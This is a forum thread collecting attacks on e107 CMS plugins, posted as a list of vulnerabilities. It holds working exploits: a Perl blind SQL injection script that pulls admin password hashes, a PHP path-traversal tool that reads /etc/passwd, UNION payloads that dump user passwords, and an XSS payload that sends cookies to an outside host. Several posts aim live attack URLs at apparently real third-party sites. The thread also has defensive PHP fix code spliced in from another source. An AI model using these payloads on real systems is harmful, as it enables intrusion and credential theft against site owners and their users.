[ Overview of e107 CMS vulnerabilities ]

Discussion in 'Web vulnerabilities' started by Nightmarе, 16 Aug 2007.

  1. eLWAux

    e107 roll_mini v1.2 (glossary of terms) XSS
    http://e107.org.ru/download.php?view.221

    Vulnerable product: roll_mini (glossary of terms)
    Version: v1.2
    Conditions: magic quotes off

    1. XSS
    Vulnerability in file roll.php
    Vulnerable code fragment:
    PHP:
    if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";
    if ($_GET['search']) $search = $_GET['search'];
    .........
    <input class='tbox' type='hidden' name='cat' size='30' value='".$id_cat."' >
    <input class='tbox' type='text' name='search' size='30' value='".$search."' >
    The XSS attack can be carried out because of the lack of filtering in roll.php

    Exploit:
     
  2. eLWAux

    coppermine_menu (photo gallery) Blind SQL injection
    http://web.wilan.com.ru/modules.php?name=Files&go=view_file&lid=115

    Vulnerable product: coppermine_menu (photo gallery)
    Version: v0.3.3

    Blind SQL injection
    Vulnerability in file util.php
    Vulnerable code fragment:
    PHP:
    $action = $_POST['action'];
    ....
    function filenametotitle($delete)
    {
        $albumid = $_POST['albumid'];
        $parsemode = $_POST['parsemode'];
        ....
        $query = "SELECT * FROM $picturetbl WHERE aid = '$albumid'";
        $result = MYSQL_QUERY($query);
        $num = mysql_numrows($result);
    }
    ......
    } else if ($action == 'title') { ....
        filenametotitle(0); ..}
    ........
    The SQL injection attack can be carried out because of the lack of filtering of the action and albumid data in the POST request

    Exploit:
     
  3. eLWAux

    EasyShop adminXSS
    http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.461

    Vulnerable product: EasyShop
    Conditions: admin rights are needed (if you use social engineering, you can make the admin send you his cookies..))

    XSS
    Vulnerability in file admin_main_categories_edit.php
    Vulnerable code fragment:
    PHP:
    ..
    } else if ($_GET['delete_main_category'] == '1') {
    <a href='admin_main_categories_edit.php?delete_main_category=2&main_category_id=".$_GET['main_category_id']."'>".
    ...
    only usable in combination with social engineering

    Exploit:
     
  4. Roba

    Full path disclosure --last upd

    Code:
    /online.php
    /e107_plugins/log/consolidate.php
    /e107_plugins/log/log.php
    /e107_plugins/pdf/e107pdf.php
    
     
  5. Roba

    Version disclosure --last upd
    Code:
    /e107_admin/credits.php
    /e107_docs/README.html
    /e107_docs/README_UPGRADE.html
    /e107_files/e107.js
    /e107_files/shortcode/sitelinks_alt.sc
    /e107_handlers/tiny_mce/plugins/ibrowser/editor_plugin.js
     
  6. fire64

    XSS in the forum plugin, version v.0.7.15

    the thread title is not filtered

    Code:
    ><script>alert(1)</script><
    
     
  7. f1ng3r

    e107 Plugin userjournals_menu

    Code:
    ###################################################################
    e107 Plugin userjournals_menu (blog.id) SQL injection vulnerability 
    ###################################################################
    
    
    ###################################################
    #[~] Author        :  boom3rang 
    #[~] Greetz        :  H!tm@N, KHG, chs, redc00de
    #[~] Vulnerability :  Remote SQL-injection
    #[~] Google Dork   :  inurl:"userjournals.php?blog."
    --------------------------------------------------   
    #[!] Product Site  :  http://www.bugrain.com
    #[!] Download CMS  :  http://www.e107coders.org/download.php?view.1402
    #[!] Version       :  v0.7 or later
    ###################################################
    
    
    [-] POC:
    http://localhost/plugins/userjournals_menu/userjournals.php?blog.[exploit]
    
    [-] Exploit:
    -9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
    
    [-] Exploit 2:
    -9999 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
    
    [+] LiveDemo:
    http://demo.infozonelab.com/plugins/userjournals_menu/userjournals.php?blog.-9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
    
    
    ###########################
    United States of Albania
    Proud to be Albanian
    R.I.P redc00de
    ###########################
    © milw0rm.com [2009-04-13]
     
  8. Solide Snake

    e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit

    Code:
    #!/usr/bin/env perl
    #
    # e107 <= 0.7.15 "extended_user_fields" Blind SQL Injection Exploit
    #
    # Description
    # -------------------------------------------------------------------
    # e107 contains one flaw that allows an attacker to carry out an SQL
    # injection attack. The issue is due to the "usersettings.php" script 
    # not properly saniting user-supplied input to the hide[] key. 
    # This may allow an attacker to inject or manipulate sql queries in
    # the backend database if magic_quotes_gpc = off.
    # -------------------------------------------------------------------
    # Code Details (usersettings.php) 
    # -------------------------------------------------------------------
    # Line 433 - 441 
    #
    # if($ue_fields) {
    #    $hidden_fields = implode("^", array_keys($_POST['hide'])); <------ {1}
    #     
    #     if($hidden_fields != "")
    #     {
    #	 $hidden_fields = "^".$hidden_fields."^";  
    #     }
    #     $ue_fields .= ", user_hidden_fields = '".$hidden_fields."'"; <---- {2}
    #   }
    #
    # Line 470 - 476
    #  
    #  if($ue_fields) 
    #  {
    #    [etc..]
    #    $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'");
    #  }  
    #  
    # ue[] POST variable needs a valid key
    # such as "aim","msn" or other user_extended_fields
    # (@fields array). 
    #
    # Fix this sql injection using (php function)
    # mysql_real_escape_string to the POST 'hide' key,
    # otherwise find a way to fix it. dont care
    # ------------------------------------------
    # Discovered & Written 
    # by Juri Gianni aka yeat - staker[at]hotmail[dot]it
    #  
    # Thanks to
    # ---------------------------------------------
    # JosS,girex,str0ke,certaindeath,plucky
    # #zeroidentity chan - http://zeroidentity.org
    # ---------------------------------------------
    # http://www.youtube.com/watch?v=0rgInHvW8Ic
    # http://www.youtube.com/watch?v=O2y62xcUJ8E
    # ---------------------------------------------
    
    use LWP::UserAgent;
    
    
    my $prefix = "e107_"; # default table_prefix
    my $type_i = undef;
    my $sock_u = new LWP::UserAgent;
    
    my ($domain,$user_name,$user_pwd,$target) = @ARGV;
    
    
    e107::Usage() unless scalar (@ARGV) > 3; 
      
    e107::Login($user_name,$user_pwd);
    $type_i = e107::ExtendedField();
    e107::Exploit();
        
    
    sub e107::Usage
    {
           print "e107 <= 0.7.15 'extended_user_fields' Blind SQL Injection Exploit\n";
           print "Usage: perl xpl.pl http://[host]/[path] [username] [password] [target id]\n";
           print "Usage: perl xpl.pl http://localhost/e107 yeat an4rchy 1\n";
           exit;
    }       
    
    sub e107::Exploit
    {
         e107::Vulnerable();
         e107::BruteForce(); 
    }
    
    
    
    sub e107::SqlQuery
    {
           my ($do_query,$response,$start,$down,$element);
           
           $do_query = $_[0] || die $!;
           
           $start = time();
      
           $response = $sock_u->post($domain.'/usersettings.php',
                                   [
                                     "email"           => 'doesnt@exists.net',
                                     "ue[user_$type_i]" => 1,
                                     "hide[$do_query]" => 1,
                                     "updatesettings"  => 'Save Settings',
                                  ]) or die $!;
           $down = time();
           
           return $down - $start;                            
    }
    
    
    
    sub e107::CheckField
    {
           my ($do_query,$response,$start,$down,$element);
           
           $do_query = $_[0];
           $element  = $_[1] || die $!;  
           
           
           $start = time();
      
           $response = $sock_u->post($domain.'/usersettings.php',
                                   [
                                     "email"           => 'doesnt@exists.net',
                                     "ue[user_$element]" => 1,
                                     "hide[$do_query]" => 1,
                                     "updatesettings"  => 'Save Settings',
                                  ]) or die $!;
           $down = time();
           
           return $down - $start;                            
    }
          
          
    
    sub e107::ExtendedField
    {
           my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');
           
           my $query = "\x27/**/OR/**/CASE/**/WHEN(1>0)/**/THEN".
                       "/**/benchmark(100000000,CHAR(0))/**/END#";
                       
           for (my $i=1;$i<8;$i++) {
                 
                 if (e107::CheckField($query,$fields[$i]) > 6) {
                    return $fields[$i]; last;
                 }     
                 unless ($i != 8 && $fields[$i]) {
                   die("Site not vulnerable..\n");
                 }
           }          
    } 
            
            
    
    sub e107::SqlBrute
    {
           my $ascii = $_[0];
           my $limit = $_[1] || 1;
           
           my $sql_query = "\x27/**/OR/**/(SELECT/**/IF((ASCII(SUBSTRING(user_password,$limit,1))".
                           "=$ascii),benchmark(200000000,CHAR(0)),0)/**/FROM/**/${prefix}user/**/".
                           "WHERE/**/user_id=$target)#";
           
           return $sql_query;                
    }
    
    
    
    sub e107::BruteForce
    {
           my $i = 1;
           my @charset = (97..102,48..57);
           my $convert = undef;
           my $result  = undef;
           
           
           for ($i..32) {
                 
                 foreach $convert (@charset) {
                       
                       if (e107::SqlQuery(e107::SqlBrute($convert,$i)) > 9) {
                          syswrite(STDOUT,chr($convert)); $i++;
                          last; $result .= chr($convert);
                       }              
                 }
           }
           
           unless (length($result) != 32) {
              print "\nHash MD5: $result\n";
              print "User ID: $target\n";
           }
    }
    
    
    
    sub e107::Vulnerable
    {             
           my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');
           
           for (my $i=1;$i<8;$i++) {
           
                if ($fields[$i] eq $type_i) {
                   print "Exploiting..\n"; last;
                }
                else {
                   die ("Site not vulnerable..\n");
                }
           }             
    }       
        
                             
    
    sub e107::Login
    {
            my ($username,$password) = @_;
            my ($result,$response);
            
            $response =  $sock_u->post($domain.'/signup.php',
                                     [
                                       username  => $username,
                                       userpass  => $password,
                                       userlogin => 'Login',
                                       autologin => 0
                                     ]) or die $!;
            
            $result = $response->as_string;                         
                                     
            if ($result =~ /e107cookie=(\d+)\.([0-9a-f]{32})/i) {
                 $sock_u->default_header('Cookie' => "e107cookie=$1.$2;"); 
                 $sock_u->agent('Lynx (textmode) - Logged');
            }
            else {
               die("Login failed..\n");
            }   
    }
    
    # milw0rm.com [2009-04-20]
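The advisory header above points at the root cause: the keys of the hide[] POST array are glued into an UPDATE statement unchecked. The following is an added example, not e107's own code, of how usersettings.php could build and store user_hidden_fields safely: it whitelists the keys against the known extended-field names (assumed here to be loaded from the user_extended_struct table) and binds the result instead of concatenating it. SQLite in memory stands in for the MySQL table.

```php
<?php
// Added example, not e107's own code: safe construction of the user_hidden_fields
// value that usersettings.php derives from $_POST['hide'] (advisory lines 433-441).

// Keep only hide[] keys that name a real extended field. Any other key, including
// one carrying quotes or SQL, is dropped. $allowed_fields is assumed to be loaded
// from the user_extended_struct table in real code.
function build_hidden_fields(array $posted_hide, array $allowed_fields): string
{
    $keys = [];
    foreach (array_keys($posted_hide) as $key) {
        // Compare as strings: PHP converts numeric-looking array keys to integers.
        if (in_array((string) $key, $allowed_fields, true)) {
            $keys[] = (string) $key;
        }
    }
    if ($keys === []) {
        return '';
    }
    return '^' . implode('^', $keys) . '^';
}

// Bind the value rather than concatenating it, so even a whitelisted value can
// never change the shape of the query.
function update_hidden_fields(PDO $db, int $user_id, string $hidden_fields): int
{
    $stmt = $db->prepare(
        'UPDATE e107_user_extended SET user_hidden_fields = :hidden WHERE user_extended_id = :id'
    );
    $stmt->execute([':hidden' => $hidden_fields, ':id' => $user_id]);
    return $stmt->rowCount();
}

// Constructed demo input: one legitimate key and one injection-shaped key of the
// kind the exploit above submits as hide[...].
$allowed = ['aim', 'msn', 'icq', 'yahoo', 'location', 'homepage'];
$posted  = ['aim' => 1, "x' OR 1=1#" => 1];

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE e107_user_extended (user_extended_id INTEGER PRIMARY KEY, user_hidden_fields TEXT)');
$db->exec("INSERT INTO e107_user_extended VALUES (1, '')");

$hidden = build_hidden_fields($posted, $allowed);
$rows   = update_hidden_fields($db, 1, $hidden);

$stored = $db->query('SELECT user_hidden_fields FROM e107_user_extended WHERE user_extended_id = 1')->fetchColumn();
// Only the whitelisted key survives; the injection-shaped key never reaches SQL.
var_dump($hidden, $rows, $stored);
```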
     
  9. [underwater]

    ZoGo-Shop e107 plugin

    Vuln File:
    product_details.php

    Vuln Code:
    Code:
    e107_plugins/zogo-shop/product_details.php
    $product_ID=$_GET["product"];
    Exploit:
    Code:
    http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]
     
  10. Psi.X

    There's this thing...
    In the file e107_admin/auth.php
    PHP:
        function authcheck($authname, $authpass)
        {
            /*
            # Admin auth check
            # - parameter #1:  string $authname, entered name
            # - parameter #2:  string $authpass, entered pass
            # - return         boolean if fail, else result array
            # - scope          public
            */
            global $tp;
            $sql_auth = new db;
            $authname = $tp -> toDB(preg_replace("/\sOR\s|\=|\#/", "", $authname));
            if ($sql_auth->db_Select("user", "*", ""))//"user_loginname='$authname' OR 1=1"))// AND user_admin='1' "))
    The login goes into the database through $tp -> toDB() but IS NOT FILTERED!
    You can add echo $authname after it, and we will see the result.
    But on my localhost I never managed to do anything. Some kind of nonsense comes out...
    The query seems to be there, MySQL returns a handle, but when the row count is checked it returns 0.
    For the life of me I can't understand what's going on...
     
  11. Grey

    How is it not filtered, when on the contrary it is very much filtered.
    Look at e107_handlers/e_parse_class.php

    To avoid what you ran into, I will put /*1*/ in those parts of the code which the browser perceives differently from what they really are:

    Code:
    	function toDB($data, $nostrip = false, $no_encode = false, $mod = false)
    	{
    		global $pref;
    		if (is_array($data)) {
    			// recursively run toDB (for arrays)
    			foreach ($data as $key => $var) {
    				$ret[$key] = $this -> toDB($var, $nostrip, $no_encode, $mod);
    			}
    		} else {
    			if (MAGIC_QUOTES_GPC == TRUE && $nostrip == false) {
    				$data = stripslashes($data);
    			}
    			if(isset($pref['post_html']) && check_class($pref['post_html']))
    			{
    				$no_encode = TRUE;
    			}
    			if ($no_encode === TRUE && $mod != 'no_html')
    			{
    				$search = array('$', '"', "'", '\\', '<?');
    				$replace = array('&#/*1*/036;','&q/*1*/uot;','&#/*1*/039;', '&#0/*1*/92;', '&/*1*/lt;?');
    				$ret = str_replace($search, $replace, $data);
    			} else {
    				$data = htmlspecialchars($data, ENT_QUOTES, CHARSET);
    				$data = str_replace('\\', '&#092;', $data);
    				$ret = preg_replace("/&amp;#(\d*?);/", "&#\\1;", $data);
    			}
    			//If user is not allowed to use [php] change to entities
    			if(!check_class($pref['php_bbcode']))
    			{
    				$ret = preg_replace("#\[(php)#i", "[\\1", $ret);
    			}
    
    		}
    
    		return $ret;
    	}
    To put it a bit shorter, here is the replacement we care about:

    ' -> &#/*1*/039;

    What does the browser do? It displays &#/*1*/039; as the familiar quote.
    What do you do? You add echo($authname); to the code
    And you see what you want to see, a quote, but if you look at the page source (HTML (View - Page Source)), you can see there is no quote there, but &#/*1*/039;
     
  12. ettee

    The vulnerability exists due to insufficient sanitization of the "email" parameter in a POST request to the guestbook.php script.
    Vulnerable field: "E-mail". The constructed POST data:
    Code:
    POSTDATA=name=E107 CMS (e107_plugins/guestbook) stored XSS by ettee(itdefence.ru)&email='><script>alert('xss')</script>
    Example: http://target/e107_plugins/guestbook/guestbook.php?edit.2. Where "2" is the number of your message.
    Google dork: inurl:/e107_plugins/guestbook/guestbook.php
    Cookie: '><script>img = new Image(); img.src = "http://someshit.net/image/s.gif?"+document.cookie;</script>
     
  13. Solide Snake

    e107 Plugin my_gallery 2.4.1 Exploit

    e107 Plugin my_gallery 2.4.1 Exploit


    Class: Input Validation Error
    Remote: Yes
    Vulnerable: e107.org my_gallery 2.4.1
    e107.org my_gallery 2.3
    e107.org my_gallery 0

    Code:
    <?php
    
    /*
    
    ============================================
    [o] e107 Plugin my_gallery 2.4.1 Exploit [o]
    ============================================
    
    Bug [f]ound by NoGe - noge.code@gmail.com
    Exploit [c]oded by Vrs-hCk - d00r@telkom.net
    
    * Plugin my_gallery create photo gallery.
    * Powered by Highslide JS script.
    * With random gallery menu and navigation menu.
    * Has a comment system, ratings and search of images.
    
    Download e107 my_gallery 2.4.1 Plugin
    http://code.google.com/p/e107mygalleryplugin/downloads/list
    
    
    =============
    [o] Usage [o]
    =============
    
    Web 2 XPL << fill with site who use e107 Plugin my_gallery
    File 2 Read << fill with file or directory you want to read
    
    Web 2 XPL : www.contoh.com
    File 2 Read : /etc/passwd
    
    Then Go!!!
    
    
    ==============
    [o] Greetz [o]
    ==============
    
    MainHack BrotherHood [ http://news.serverisdown.org ]
    Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
    H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
    skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
    
    FUCK TERORIS!!
    
    */
    
    $vuln  = '/e107_plugins/my_gallery/image.php?file=';
    $trasv = '/../../../../../../../../../../../../../../..';
    
    echo "<form method=POST>
    Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
    File 2 Read : <input type=\"text\" name=\"file\" size=30>
    <input type=submit value=\"Go!!!\" name=\"_xpl\">
    <br><br>";
    
    if ($_POST['_xpl']) {
    	$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
    	$data .= "Host: {$host}\r\n";
    	$data .= "Connection: close\r\n\r\n";
    	$html  = sendpacket($host,$data);
    	print '<pre>'.htmlspecialchars($html).'</pre>';
    }
    
    echo "</form>";
    
    function sendpacket($host,$data) {
    	if (!$sock = @fsockopen($host,80)) {
    		die("[!] Connection refused, try again!\n");
    	}
    	fputs($sock,$data);
    	while (!feof($sock)) { $html .= fgets($sock); }
    	fclose($sock);
    	return $html;
    }
    
    ?>
    
    # milw0rm.com [2009-07-23]
     
  14. HAXTA4OK

    1. image.php?file='; that is in the image.php file from the post above


    2. File reader

    File dload.php

    PHP:
    <?php
    $file = $_GET['file'];
    $date_txt = date("y-m-d_H-i-s");
    $text = "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
    header('Content-type: image/jpeg');
    header($text);
    readfile($file);
    ?>
    all the same, just in one more file

    Example : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd


    there it will offer you to save a picture; save it, open it in notepad and you will see the following lines

    Code:
    <br />
    <b>Warning</b>:  readfile(\') [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/home/verrechi/public_html/e107_plugins/my_gallery/dload.php</b> on line <b>7</b><br />
    
    *DB config

    http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
     
    #34 HAXTA4OK, 26 Aug 2009
    Last edited: 26 Aug 2009
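Both my_gallery handlers discussed above (image.php?file= in the exploit post and dload.php here) hand a user-supplied path straight to the file system, and the readfile() warning additionally leaks the server path. The following is an added example, not the plugin's own code, of a hardened dload.php: it accepts only a bare image file name, resolves it inside a fixed gallery directory (the images/ location is an assumption) and returns a plain 404 for anything else.

```php
<?php
// Added example, not the my_gallery plugin's own code: a hardened replacement for
// dload.php. The gallery directory is an assumption.

// Resolve $requested inside $base_dir and return the absolute path, or null when
// the request names anything outside the gallery or anything that is not an image.
function safe_gallery_path(string $base_dir, string $requested): ?string
{
    $base = realpath($base_dir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Accept a bare file name only: no "/", no "..", no absolute paths.
    if (basename($requested) !== $requested || $requested === '.' || $requested === '..') {
        return null;
    }
    // Serve only the image types the gallery stores.
    if (!preg_match('/\.(jpe?g|png|gif)$/i', $requested)) {
        return null;
    }
    // realpath() also follows symlinks, so a link pointing out of $base is rejected.
    $prefix = $base . DIRECTORY_SEPARATOR;
    $full = realpath($prefix . $requested);
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0 || !is_file($full)) {
        return null;
    }
    return $full;
}

// Assumed location of the gallery files relative to this script.
$gallery_dir = __DIR__ . '/images';
$path = safe_gallery_path($gallery_dir, (string) ($_GET['file'] ?? ''));

if ($path === null) {
    // Fail without echoing the request or a PHP warning: the original version
    // disclosed the full server path in its readfile() error, as shown above.
    header('HTTP/1.1 404 Not Found');
    exit;
}

$date_txt = date('y-m-d_H-i-s');
header('Content-Type: image/jpeg');
header('Content-Disposition: attachment; filename="e107_my_gallery_' . $date_txt . '.jpg"');
readfile($path);
```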
  15. [underwater]

    Actually the exploit was written earlier: http://milw0rm.com/exploits/5308
     
  16. L I G A

    e107(e107_v0.7.16_standart_RUS)


    active XSS in news comments
    Code:
    ......./path/comment.php?comment.news.[id]
    Submit comment
    Subject: <script>alert(//)</script>
    Comment:<script>alert(//)</script>

    the cookies look like:
    1.1a1dc91c907325c69271ddf0c944bc72
    id.md5(pass)


    at install time the table prefix is not filtered
    Code:
    mysql_query("INSERT INTO {$this->previous_steps['mysql']['prefix']}core VALUES ('SitePrefs_Backup', '{$tmp}')");
     
  17. [x60]unu

    SQL injection in e107 cms
    Version = v0.7 or later
    SQL
    http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]

    1:
    Code:
    -1 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
    2:
    Code:
    -1 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
    bug site:
    http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@version,8,9,0,11,12,13--
     
  18. Solide Snake

    Cross-site scripting in the e107 0.x branch

    Code:
    Referer: "><script>alert(document.cookie)</script>
    (c)
     
  19. sir95

    It doesn't download, it just shows the image ;) , I tried but nothing worked.

    Tell me what vulnerabilities there are for 0.7.11, I really need it.
     
  20. HAXTA4OK

    e107_plugins

    Path disclosure
    By simply opening the file e107_plugins/e107shop/features.php

    example :
    PHP:
    http://northfloridahomebuilder.com/e107_plugins/e107shop/features.php
     